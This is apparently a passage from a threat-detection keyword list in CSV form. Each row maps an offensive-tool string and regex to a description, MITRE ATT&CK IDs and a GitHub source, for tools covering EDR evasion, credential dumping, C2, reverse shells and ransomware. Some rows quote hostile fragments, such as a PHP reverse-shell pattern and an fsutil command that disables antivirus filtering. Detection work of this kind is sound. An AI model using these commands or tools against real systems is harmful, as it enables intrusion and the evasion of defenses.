"*Freeze-rs -*",".{0,1000}Freeze\-rs\s\-.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. 
direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","0","N/A","N/A","8","700","78","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" "*Freeze-rs.exe*",".{0,1000}Freeze\-rs\.exe.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","8","700","78","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" "*Freeze-rs_darwin_amd64*",".{0,1000}Freeze\-rs_darwin_amd64.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","8","700","78","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" "*Freeze-rs_linux_amd64*",".{0,1000}Freeze\-rs_linux_amd64.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","8","700","78","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" "*Freeze-rs_windows_amd64.exe*",".{0,1000}Freeze\-rs_windows_amd64\.exe.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. 
direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","8","700","78","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" "*frida -l disableRoot.js -f owasp.mstg.uncrackable1*",".{0,1000}frida\s\-l\sdisableRoot\.js\s\-f\sowasp\.mstg\.uncrackable1.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*frida-ps -U*",".{0,1000}frida\-ps\s\-U.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*frida-trace -x ntdll.dll -i * -p *",".{0,1000}frida\-trace\s\-x\sntdll\.dll\s\-i\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*Frissi0n/GTFONow*",".{0,1000}Frissi0n\/GTFONow.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","1","N/A","6","10","N/A","N/A","N/A","N/A" 
"*frkngksl/NimExec*",".{0,1000}frkngksl\/NimExec.{0,1000}","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","4","357","39","2023-12-12T06:59:59Z","2023-04-21T19:46:53Z" "*frkngksl/Shoggoth*",".{0,1000}frkngksl\/Shoggoth.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","1","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*frkngksl/UnlinkDLL*",".{0,1000}frkngksl\/UnlinkDLL.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","1","N/A","7","1","54","11","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z" "*from .core import Fuzzer*",".{0,1000}from\s\.core\simport\sFuzzer.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*from .modules.exploit import Exploit*",".{0,1000}from\s\.modules\.exploit\simport\sExploit.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*from .secretsdump import 
RemoteOperations*",".{0,1000}from\s\.secretsdump\simport\sRemoteOperations.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*from .socks import SocksNegotiator*",".{0,1000}from\s\.socks\simport\sSocksNegotiator.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","642","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*from .wfuzz import *",".{0,1000}from\s\.wfuzz\simport\s.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*from bofhound import *",".{0,1000}from\sbofhound\simport\s.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*from bofhound.ad import*",".{0,1000}from\sbofhound\.ad\simport.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - 
TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*from burp import *",".{0,1000}from\sburp\simport\s.{0,1000}","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/albinowax/ActiveScanPlusPlus","1","0","N/A","N/A","6","574","182","2022-11-15T13:47:31Z","2014-06-23T10:04:13Z" "*from burp import*",".{0,1000}from\sburp\simport.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","10","1749","335","2024-03-17T17:15:56Z","2020-06-08T10:50:12Z" "*from DiscordBot import MitmPuppeter*",".{0,1000}from\sDiscordBot\simport\sMitmPuppeter.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. 
This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*from evilrdp.consolehelper*",".{0,1000}from\sevilrdp\.consolehelper.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*from Exrop import *",".{0,1000}from\sExrop\simport\s.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","0","N/A","N/A","3","277","27","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*from gtfonow.*",".{0,1000}from\sgtfonow\..{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*from helpers.*_smbserver * import SimpleSMBServer*",".{0,1000}from\shelpers\..{0,1000}_smbserver\s.{0,1000}\simport\sSimpleSMBServer.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation 
tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*from hiphp import *",".{0,1000}from\shiphp\simport\s.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*from holehe.core import*",".{0,1000}from\sholehe\.core\simport.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","6663","755","2024-04-10T07:34:29Z","2020-06-25T23:03:02Z" "*from https://github.com/S3cur3Th1sSh1t/Nim_Dinvoke*",".{0,1000}from\shttps\:\/\/github\.com\/S3cur3Th1sSh1t\/Nim_Dinvoke.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*from https://www.stevencampbell.info/Nim-Convert-Shellcode-to-UUID*",".{0,1000}from\shttps\:\/\/www\.stevencampbell\.info\/Nim\-Convert\-Shellcode\-to\-UUID.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - 
TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*from lib.config import *C2_COMMANDS*",".{0,1000}from\slib\.config\simport\s.{0,1000}C2_COMMANDS.{0,1000}","offensive_tool_keyword","Kraken","Kraken is a modular multi-language webshell focused on web post-exploitation and defense evasion.","T1505 - T1547 - T1218 - T1564.001","TA0003 - TA0005 - TA0011 ","N/A","N/A","C2","https://github.com/kraken-ng/Kraken","1","0","N/A","10","10","495","48","2024-02-10T20:10:18Z","2023-02-21T10:23:55Z" "*from Maitm.Maitm *",".{0,1000}from\sMaitm\.Maitm\s.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*from merlin import *",".{0,1000}from\smerlin\simport\s.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","0","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "*from networking.dhcp_dns_update_utils*",".{0,1000}from\snetworking\.dhcp_dns_update_utils.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 
TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*from pwn import *",".{0,1000}from\spwn\simport\s.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","0","N/A","N/A","3","277","27","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*from pysnaffler.rules.constants import *",".{0,1000}from\spysnaffler\.rules\.constants\simport\s.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*from pysnaffler.rules.rule import SnaffleRule*",".{0,1000}from\spysnaffler\.rules\.rule\simport\sSnaffleRule.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*from pysnaffler.ruleset import SnafflerRuleSet*",".{0,1000}from\spysnaffler\.ruleset\simport\sSnafflerRuleSet.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. 
Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*from pysnaffler.scanner import SnafflerScanner*",".{0,1000}from\spysnaffler\.scanner\simport\sSnafflerScanner.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*from pysnaffler.snaffler import *",".{0,1000}from\spysnaffler\.snaffler\simport\s.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. 
Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","0","N/A","10","1","75","4","2023-12-03T20:02:25Z","2023-11-17T21:52:40Z" "*from rarce import exploit*",".{0,1000}from\srarce\simport\sexploit.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*from shellcodes import *",".{0,1000}from\sshellcodes\simport\s.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*from spoofer_config import SpooferConfig*",".{0,1000}from\sspoofer_config\simport\sSpooferConfig.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*from tor2web import*",".{0,1000}from\stor2web\simport.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*from wapitiCore.*",".{0,1000}from\swapitiCore\..{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*frpc.exe -c frpc.in*",".{0,1000}frpc\.exe\s\-c\sfrpc\.in.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*fscan.exe -*",".{0,1000}fscan\.exe\s\-.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*fsockopen(*0.0.0.0*4444*exec(*",".{0,1000}fsockopen\(.{0,1000}0\.0\.0\.0.{0,1000}4444.{0,1000}exec\(.{0,1000}","offensive_tool_keyword","OMGLogger","Key logger which sends each 
and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*fsutil devdrv enable /disallowAv*",".{0,1000}fsutil\sdevdrv\senable\s\/disallowAv.{0,1000}","offensive_tool_keyword","fsutil","Disables antivirus filtering on the developer drive","T1112 - T1562.001 - T1222.001 - T1480","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://x.com/0gtweet/status/1720532496847167784","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*FtpC2.exe*",".{0,1000}FtpC2\.exe.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","1","N/A","10","10","81","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z" "*FtpC2.Tasks*",".{0,1000}FtpC2\.Tasks.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","0","N/A","10","10","81","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z" "*ftshell -*",".{0,1000}ftshell\s\-.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" "*ftshell.v3*",".{0,1000}ftshell\.v3.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File 
transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" "*Fuck-Etw-main*",".{0,1000}Fuck\-Etw\-main.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*fucksetuptools*",".{0,1000}fucksetuptools.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*FuckThatPacker.*",".{0,1000}FuckThatPacker\..{0,1000}","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Unknow101/FuckThatPacker","1","1","N/A","10","10","623","84","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z" "*fuckyoufuckyoufuckyoufuckyoufuckyou*",".{0,1000}fuckyoufuckyoufuckyoufuckyoufuckyou.{0,1000}","offensive_tool_keyword","VoidCrypt","VoidCrypt ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#yara","10","3","261","38","2024-05-01T19:21:20Z","2021-07-28T21:00:52Z" "*FudgeC2.*",".{0,1000}FudgeC2\..{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*FudgeC2Viewer.py*",".{0,1000}FudgeC2Viewer\.py.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and 
post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*fuegoShell-bind>*",".{0,1000}fuegoShell\-bind\>.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*Fuegoshell-client started*",".{0,1000}Fuegoshell\-client\sstarted.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*fuegoShell-reverse>*",".{0,1000}fuegoShell\-reverse\>.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - 